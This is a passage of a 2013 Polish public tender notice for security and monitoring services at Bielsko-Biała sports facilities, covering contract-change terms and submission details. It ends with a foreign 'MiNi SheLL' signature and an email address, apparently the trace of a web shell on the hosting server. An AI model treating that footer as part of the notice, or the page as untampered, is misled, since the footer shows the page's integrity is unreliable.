a)	Zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno - prawnej, przekształceniem lub połączeniem z inną firmą, 
b)	Co do treści, na podstawie której dokonano wyboru Wykonawcy w zakresie ceny netto zamówienia w przypadku zmiany stawki podatku VAT. W takim przypadku wynagrodzenie netto ulegnie odpowiednio podwyższeniu lub obniżeniu, przy zachowaniu niezmienionej ceny brutto.
c)	Zmiany osoby Kierownika Działu, upoważnionych przez Zamawiającego osób oraz osoby wyznaczonej przez Wykonawcę. W przypadku takiej zmiany Strona poinformuje pisemnie drugą stronę  o tym fakcie.     
d)	Zmiana ilości dni i godzin ochrony oraz termin rozpoczęcia i zakończenia świadczenia usług np. w przypadkach związanych ze zmianami w okresie funkcjonowania obiektów. Wykonawca zobowiązuje się do nieobciążania BBOSiR w miesięcznym rozliczeniu należnością za dni 
i godziny nie wykonywania usługi ochrony.
e)	Zmiana terminów określonych w rozdziale IV pkt. 1 oraz w załączniku nr 6 do SIWZ mogące ulec przesunięciu w przypadku wystąpienia: przestojów i opóźnień zawinionych przez Zamawiającego, działania siły wyższej, mającej bezpośredni wpływ na terminowość świadczenia usługi, wystąpienia okoliczności, których strony Umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
3.	Strony postanawiają, że na pisemny wniosek Zamawiającego możliwe jest ograniczenie, zaprzestanie lub rozszerzenie usługi ochrony fizycznej i/lub monitoringu dla poszczególnych obiektów wskazanych w załączniku nr 6. Ograniczenie, zaprzestanie lub rozszerzenie świadczenia usługi następuje najpóźniej w ciągu 10 dni od dnia powiadomienia (faksem lub e-mailem) Wykonawcy przez Zamawiającego. W przypadku zgody Wykonawcy rozszerzenie lub zaprzestanie świadczenie usługi może nastąpić w terminie krótszym niż w ciągu 10 dni. Niniejsze zmiany nie wymagają formy aneksu do umowy. 
4.	Ceny jednostkowe określone w formularzu cenowym obowiązują także dla nowych obiektów nieobjętych do tej pory ochroną w tym zakresie. W takim przypadku zostanie sporządzona umowa uzupełniająca zamówienie podstawowe.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.bbosir.bielsko.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bielsko-Bialski Ośrodek Sportu i Rekreacji w Bielsku-Białej 43-300, 
ul. M. Konopnickiej 5 - Dział zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2013 godzina 09:00, miejsce: Bielsko-Bialski Ośrodek Sportu i Rekreacji w Bielsku-Białej 43-300, 
ul. M. Konopnickiej 5 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com